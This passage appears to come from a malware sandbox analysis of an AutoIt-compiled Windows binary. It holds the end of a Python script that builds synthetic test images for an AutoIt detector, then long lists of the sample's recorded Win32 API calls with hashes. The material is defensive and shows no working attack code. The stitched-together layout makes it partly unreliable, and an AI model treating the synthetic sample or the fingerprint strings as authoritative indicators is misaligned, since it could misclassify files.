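    parts = [b"MZ" + b"\x00" * 62, b"padding" * 8]
    for s in ("AutoIt v3 GUI", "#requireadmin", "#include-once", "#notrayicon"):
        parts.append(s.encode("utf-16-le") + b"\x00\x00")
    parts.append(b"\x90" * 32 + COMPILED_SCRIPT_TAG + b"\x00" * 16)
    return b"".join(parts)


# Constructed inputs: one image that looks AutoIt-built, one that does not.
SAMPLE_IMAGE = _build_sample()
BENIGN_IMAGE = b"MZ" + b"\x00" * 62 + "Hello, world".encode("utf-16-le")


if __name__ == "__main__":
    for name, image in (("sample", SAMPLE_IMAGE), ("benign", BENIGN_IMAGE)):
        verdict, n = classify_autoit(image)
        print(f"{name}: {verdict} ({n} marker(s))")
```

               Run it against a dumped image (for instance the 00180000-based region the records above were taken from) by reading the file into `bytes` and calling `classify_autoit`. A hit on the runtime strings alone only says the file carries the AutoIt interpreter; the embedded-script tag is what distinguishes a compiled script from the stock AutoIt3.exe, so both signals are kept separate in the verdict.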
              APIs
              • GetSysColor.USER32(00000012), ref: 0020AB99
              • SetTextColor.GDI32(?,?), ref: 0020AB9D
              • GetSysColorBrush.USER32(0000000F), ref: 0020ABB3
              • GetSysColor.USER32(0000000F), ref: 0020ABBE
              • CreateSolidBrush.GDI32(?), ref: 0020ABC3
              • GetSysColor.USER32(00000011), ref: 0020ABDB
              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0020ABE9
              • SelectObject.GDI32(?,00000000), ref: 0020ABFA
              • SetBkColor.GDI32(?,00000000), ref: 0020AC03
              • SelectObject.GDI32(?,?), ref: 0020AC10
              • InflateRect.USER32(?,000000FF,000000FF), ref: 0020AC2F
              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0020AC46
              • GetWindowLongW.USER32(00000000,000000F0), ref: 0020AC5B
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0020ACA7
              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0020ACCE
              • InflateRect.USER32(?,000000FD,000000FD), ref: 0020ACEC
              • DrawFocusRect.USER32(?,?), ref: 0020ACF7
              • GetSysColor.USER32(00000011), ref: 0020AD05
              • SetTextColor.GDI32(?,00000000), ref: 0020AD0D
              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0020AD21
              • SelectObject.GDI32(?,0020A869), ref: 0020AD38
              • DeleteObject.GDI32(?), ref: 0020AD43
              • SelectObject.GDI32(?,?), ref: 0020AD49
              • DeleteObject.GDI32(?), ref: 0020AD4E
              • SetTextColor.GDI32(?,?), ref: 0020AD54
              • SetBkColor.GDI32(?,?), ref: 0020AD5E
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
              • String ID:
              • API String ID: 1996641542-0
              • Opcode ID: 8cc2ffe229b99519821f5031ab1bf2b9ae02883d60d4d1bc33f50eb9b041820d
              • Instruction ID: 5adf8dff507cda1407f628685adb70eebe9745868950eb5c3d275ad99cb26877
              • Opcode Fuzzy Hash: 8cc2ffe229b99519821f5031ab1bf2b9ae02883d60d4d1bc33f50eb9b041820d
              • Instruction Fuzzy Hash: E6617D71940318EFDB619FA4ED48EAEBB79FB08320F114125F915AB2E2D7719950CF90
              APIs
              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00208D34
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00208D45
              • CharNextW.USER32(0000014E), ref: 00208D74
              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00208DB5
              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00208DCB
              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00208DDC
              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00208DF9
              • SetWindowTextW.USER32(?,0000014E), ref: 00208E45
              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00208E5B
              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00208E8C
              • _memset.LIBCMT ref: 00208EB1
              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00208EFA
              • _memset.LIBCMT ref: 00208F59
              • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00208F83
              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00208FDB
              • SendMessageW.USER32(?,0000133D,?,?), ref: 00209088
              • InvalidateRect.USER32(?,00000000,00000001), ref: 002090AA
              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002090F4
              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00209121
              • DrawMenuBar.USER32(?), ref: 00209130
              • SetWindowTextW.USER32(?,0000014E), ref: 00209158
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
              • String ID: 0
              • API String ID: 1073566785-4108050209
              • Opcode ID: d85d865616691a75cc8020e6ba9bca42507cf280bc871170836a499e12d5430f
              • Instruction ID: 8faffdbfde487dbc3e6f8a52ede101f957e720e2ab259d90fb71c86614f78043
              • Opcode Fuzzy Hash: d85d865616691a75cc8020e6ba9bca42507cf280bc871170836a499e12d5430f
              • Instruction Fuzzy Hash: B2E1B37491030AABDF209F60DC88EEFBB79EF05710F108156F9699A1D2DB718A91DF60
              APIs
              • GetCursorPos.USER32(?), ref: 00204C51
              • GetDesktopWindow.USER32 ref: 00204C66
              • GetWindowRect.USER32(00000000), ref: 00204C6D
              • GetWindowLongW.USER32(?,000000F0), ref: 00204CCF
              • DestroyWindow.USER32(?), ref: 00204CFB
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00204D24
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00204D42
              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00204D68
              • SendMessageW.USER32(?,00000421,?,?), ref: 00204D7D
              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00204D90
              • IsWindowVisible.USER32(?), ref: 00204DB0
              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00204DCB
              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00204DDF
              • GetWindowRect.USER32(?,?), ref: 00204DF7
              • MonitorFromPoint.USER32(?,?,00000002), ref: 00204E1D
              • GetMonitorInfoW.USER32(00000000,?), ref: 00204E37
              • CopyRect.USER32(?,?), ref: 00204E4E
              • SendMessageW.USER32(?,00000412,00000000), ref: 00204EB9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
              • String ID: ($0$tooltips_class32
              • API String ID: 698492251-4156429822
              • Opcode ID: 33195a47ad3f3986d79925591362db5c824e116aec76ef26b52bce9c6d134413
              • Instruction ID: ada9d4ab7c487a12ad7f530c75a5a828eeb6ee18ec3d951e29605558bd95f47c
              • Opcode Fuzzy Hash: 33195a47ad3f3986d79925591362db5c824e116aec76ef26b52bce9c6d134413
              • Instruction Fuzzy Hash: B5B19DB0614341AFDB44EF64C948B6ABBE4FF84304F008A1DF6999B2A2C771ED15CB51
              APIs
              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 001E46E8
              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001E470E
              • _wcscpy.LIBCMT ref: 001E473C
              • _wcscmp.LIBCMT ref: 001E4747
              • _wcscat.LIBCMT ref: 001E475D
              • _wcsstr.LIBCMT ref: 001E4768
              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 001E4784
              • _wcscat.LIBCMT ref: 001E47CD
              • _wcscat.LIBCMT ref: 001E47D4
              • _wcsncpy.LIBCMT ref: 001E47FF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
              • API String ID: 699586101-1459072770
              • Opcode ID: 49ffaa5601d0817cdb9887300094384b882252e780b134d07c3af4643ec9ef32
              • Instruction ID: c2088d98cbb75667644c0d1b84ade40707803cca8ccd335402da513c007a16d1
              • Opcode Fuzzy Hash: 49ffaa5601d0817cdb9887300094384b882252e780b134d07c3af4643ec9ef32
              • Instruction Fuzzy Hash: E541277AA00340BBEB25AB759D47EBF77ACDF57710F00006AF904E6182EB70DA1196A5
              APIs
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001828BC
              • GetSystemMetrics.USER32(00000007), ref: 001828C4
              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001828EF
              • GetSystemMetrics.USER32(00000008), ref: 001828F7
              • GetSystemMetrics.USER32(00000004), ref: 0018291C
              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00182939
              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00182949
              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0018297C
              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00182990
              • GetClientRect.USER32(00000000,000000FF), ref: 001829AE
              • GetStockObject.GDI32(00000011), ref: 001829CA
              • SendMessageW.USER32(00000000,00000030,00000000), ref: 001829D5
                • Part of subcall function 00182344: GetCursorPos.USER32(?), ref: 00182357
                • Part of subcall function 00182344: ScreenToClient.USER32(002467B0,?), ref: 00182374
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000001), ref: 00182399
                • Part of subcall function 00182344: GetAsyncKeyState.USER32(00000002), ref: 001823A7
              • SetTimer.USER32(00000000,00000000,00000028,00181256), ref: 001829FC
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
              • String ID: AutoIt v3 GUI
              • API String ID: 1458621304-248962490
              • Opcode ID: a8ccea4b3567cd469b846c1e847d09edd962ed4a7c008dc6ba48c1f8d25b0cc7
              • Instruction ID: 50ea0ff2269ecb7be09c3600be771542394a97cc2256dd8ceef556fe0bd61bb5
              • Opcode Fuzzy Hash: a8ccea4b3567cd469b846c1e847d09edd962ed4a7c008dc6ba48c1f8d25b0cc7
              • Instruction Fuzzy Hash: E7B19F75A4020AEFDB25EFA8DD89BED7BB4FB09714F104129FA15A72A0CB709940CF51
              APIs
              • CharUpperBuffW.USER32(?,?), ref: 002040F6
              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002041B6
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: BuffCharMessageSendUpper
              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
              • API String ID: 3974292440-719923060
              • Opcode ID: 4632cbfc821c8bdf296d26749ac56022ce33409d7928b3d552e2cb3ebcea323b
              • Instruction ID: fe06716a6f123467164af0d34329f3d5a37aa6089ef7e57b00a440cb53275a82
              • Opcode Fuzzy Hash: 4632cbfc821c8bdf296d26749ac56022ce33409d7928b3d552e2cb3ebcea323b
              • Instruction Fuzzy Hash: 5EA1AFB02243029FCB14FF60C981A7AB3A5AF98314F14896DB9969B7D3DB30ED15CB41
              APIs
              • LoadCursorW.USER32(00000000,00007F89), ref: 001F5309
              • LoadCursorW.USER32(00000000,00007F8A), ref: 001F5314
              • LoadCursorW.USER32(00000000,00007F00), ref: 001F531F
              • LoadCursorW.USER32(00000000,00007F03), ref: 001F532A
              • LoadCursorW.USER32(00000000,00007F8B), ref: 001F5335
              • LoadCursorW.USER32(00000000,00007F01), ref: 001F5340
              • LoadCursorW.USER32(00000000,00007F81), ref: 001F534B
              • LoadCursorW.USER32(00000000,00007F88), ref: 001F5356
              • LoadCursorW.USER32(00000000,00007F80), ref: 001F5361
              • LoadCursorW.USER32(00000000,00007F86), ref: 001F536C
              • LoadCursorW.USER32(00000000,00007F83), ref: 001F5377
              • LoadCursorW.USER32(00000000,00007F85), ref: 001F5382
              • LoadCursorW.USER32(00000000,00007F82), ref: 001F538D
              • LoadCursorW.USER32(00000000,00007F84), ref: 001F5398
              • LoadCursorW.USER32(00000000,00007F04), ref: 001F53A3
              • LoadCursorW.USER32(00000000,00007F02), ref: 001F53AE
              • GetCursorInfo.USER32(?), ref: 001F53BE
              • GetLastError.KERNEL32(00000001,00000000), ref: 001F53E9
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Cursor$Load$ErrorInfoLast
              • String ID:
              • API String ID: 3215588206-0
              • Opcode ID: c6fb70f55347a3e37506435338a3ae783a36934578e957c2f56e482fb5b84170
              • Instruction ID: 60a028716db3228008cb708a490db346db7e3aebcd43bead4ee1422c2586feca
              • Opcode Fuzzy Hash: c6fb70f55347a3e37506435338a3ae783a36934578e957c2f56e482fb5b84170
              • Instruction Fuzzy Hash: 88418470E043196ADB109FBA8C4986FFFF8EF51B50B10452FE609E7291DBB8A501CE91
              APIs
              • GetClassNameW.USER32(?,?,00000100), ref: 001DAAA5
              • __swprintf.LIBCMT ref: 001DAB46
              • _wcscmp.LIBCMT ref: 001DAB59
              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001DABAE
              • _wcscmp.LIBCMT ref: 001DABEA
              • GetClassNameW.USER32(?,?,00000400), ref: 001DAC21
              • GetDlgCtrlID.USER32(?), ref: 001DAC73
              • GetWindowRect.USER32(?,?), ref: 001DACA9
              • GetParent.USER32(?), ref: 001DACC7
              • ScreenToClient.USER32(00000000), ref: 001DACCE
              • GetClassNameW.USER32(?,?,00000100), ref: 001DAD48
              • _wcscmp.LIBCMT ref: 001DAD5C
              • GetWindowTextW.USER32(?,?,00000400), ref: 001DAD82
              • _wcscmp.LIBCMT ref: 001DAD96
                • Part of subcall function 001A386C: _iswctype.LIBCMT ref: 001A3874
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
              • String ID: %s%u
              • API String ID: 3744389584-679674701
              • Opcode ID: 5fd21e1ff810d7bea242e37997164b5220f8bd6c02c23edac2915a62ee984324
              • Instruction ID: 264ce548182251becdd2a6f5fa0099a0c5b9231d55c5408bffe8e0c5a4e8d165
              • Opcode Fuzzy Hash: 5fd21e1ff810d7bea242e37997164b5220f8bd6c02c23edac2915a62ee984324
              • Instruction Fuzzy Hash: A7A1D271204706AFDB14DF64C884BAAF7E9FF04315F50462AF9A9C3691DB30EA45CB92
              APIs
              • GetClassNameW.USER32(00000008,?,00000400), ref: 001DB3DB
              • _wcscmp.LIBCMT ref: 001DB3EC
              • GetWindowTextW.USER32(00000001,?,00000400), ref: 001DB414
              • CharUpperBuffW.USER32(?,00000000), ref: 001DB431
              • _wcscmp.LIBCMT ref: 001DB44F
              • _wcsstr.LIBCMT ref: 001DB460
              • GetClassNameW.USER32(00000018,?,00000400), ref: 001DB498
              • _wcscmp.LIBCMT ref: 001DB4A8
              • GetWindowTextW.USER32(00000002,?,00000400), ref: 001DB4CF
              • GetClassNameW.USER32(00000018,?,00000400), ref: 001DB518
              • _wcscmp.LIBCMT ref: 001DB528
              • GetClassNameW.USER32(00000010,?,00000400), ref: 001DB550
              • GetWindowRect.USER32(00000004,?), ref: 001DB5B9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
               • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
              • String ID: @$ThumbnailClass
              • API String ID: 1788623398-1539354611
              • Opcode ID: f0ac50d6bf125170de50f40290394d627d8309a813a1ef83843fb0e4ec3956f3
              • Instruction ID: 169e4fbfba334cbb8c3e163cf709c664e5bfed473b6a10dbe9cf5012ac245930
              • Opcode Fuzzy Hash: f0ac50d6bf125170de50f40290394d627d8309a813a1ef83843fb0e4ec3956f3
              • Instruction Fuzzy Hash: A481BE71008305DBDB15DF10D8C5FAABBE8EF54714F08856AFD868A2A2DB34EE45CB61
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • DragQueryPoint.SHELL32(?,?), ref: 0020C917
                • Part of subcall function 0020ADF1: ClientToScreen.USER32(?,?), ref: 0020AE1A
                • Part of subcall function 0020ADF1: GetWindowRect.USER32(?,?), ref: 0020AE90
                • Part of subcall function 0020ADF1: PtInRect.USER32(?,?,0020C304), ref: 0020AEA0
              • SendMessageW.USER32(?,000000B0,?,?), ref: 0020C980
              • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0020C98B
              • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0020C9AE
              • _wcscat.LIBCMT ref: 0020C9DE
              • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0020C9F5
              • SendMessageW.USER32(?,000000B0,?,?), ref: 0020CA0E
              • SendMessageW.USER32(?,000000B1,?,?), ref: 0020CA25
              • SendMessageW.USER32(?,000000B1,?,?), ref: 0020CA47
              • DragFinish.SHELL32(?), ref: 0020CA4E
              • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0020CB41
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
              • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr$
              • API String ID: 169749273-4025132185
              • Opcode ID: c37c7199cfbb9dcc50d88f65b25b454be179a70f4b2cda4be72ebfc0854732ef
              • Instruction ID: 19b3fb6a043fcd025c03e6a231fd688d1b3c3b233593a0dbd4361462bcb7712e
              • Opcode Fuzzy Hash: c37c7199cfbb9dcc50d88f65b25b454be179a70f4b2cda4be72ebfc0854732ef
              • Instruction Fuzzy Hash: 98617C71108301AFC711EF60DC89D9BBBE8EF99710F500A2DF691931A2DB709A59CF52
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: __wcsnicmp
              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
              • API String ID: 1038674560-1810252412
              • Opcode ID: 9a8805b216609f3066dee90d105885e1e2a97b863838998c6dcf3f0f1e0445aa
              • Instruction ID: bf7d0fa9c4c6fafbfe5434c240fb2986d5cf370c230feb7062ff15b9703e9bfc
              • Opcode Fuzzy Hash: 9a8805b216609f3066dee90d105885e1e2a97b863838998c6dcf3f0f1e0445aa
              • Instruction Fuzzy Hash: 8C31C376A18205E6DB14FA60CD83EEEB7B89F32750F60011AB412721D1EFA1BF14CA51
              APIs
              • LoadIconW.USER32(00000063), ref: 001DC4D4
              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001DC4E6
              • SetWindowTextW.USER32(?,?), ref: 001DC4FD
              • GetDlgItem.USER32(?,000003EA), ref: 001DC512
              • SetWindowTextW.USER32(00000000,?), ref: 001DC518
              • GetDlgItem.USER32(?,000003E9), ref: 001DC528
              • SetWindowTextW.USER32(00000000,?), ref: 001DC52E
              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001DC54F
              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001DC569
              • GetWindowRect.USER32(?,?), ref: 001DC572
              • SetWindowTextW.USER32(?,?), ref: 001DC5DD
              • GetDesktopWindow.USER32 ref: 001DC5E3
              • GetWindowRect.USER32(00000000), ref: 001DC5EA
              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 001DC636
              • GetClientRect.USER32(?,?), ref: 001DC643
              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 001DC668
              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001DC693
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
              • String ID:
              • API String ID: 3869813825-0
              • Opcode ID: 9f5d49685834e0482b880c56751db27c6bba99248918531dca89c8eea30bcfac
              • Instruction ID: e66d8cd22d349906e6e1df942b63c5fb5711a1362e089a7a855180cf9f8d7905
              • Opcode Fuzzy Hash: 9f5d49685834e0482b880c56751db27c6bba99248918531dca89c8eea30bcfac
              • Instruction Fuzzy Hash: 9851737190070AAFDB20DFA8DE89B6EBBF5FF04705F004929E552A26A1C775F904CB90
              APIs
              • _memset.LIBCMT ref: 0020A4C8
              • DestroyWindow.USER32(?,?), ref: 0020A542
                • Part of subcall function 00187D2C: _memmove.LIBCMT ref: 00187D66
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0020A5BC
              • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0020A5DE
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0020A5F1
              • DestroyWindow.USER32(00000000), ref: 0020A613
              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00180000,00000000), ref: 0020A64A
              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0020A663
              • GetDesktopWindow.USER32 ref: 0020A67C
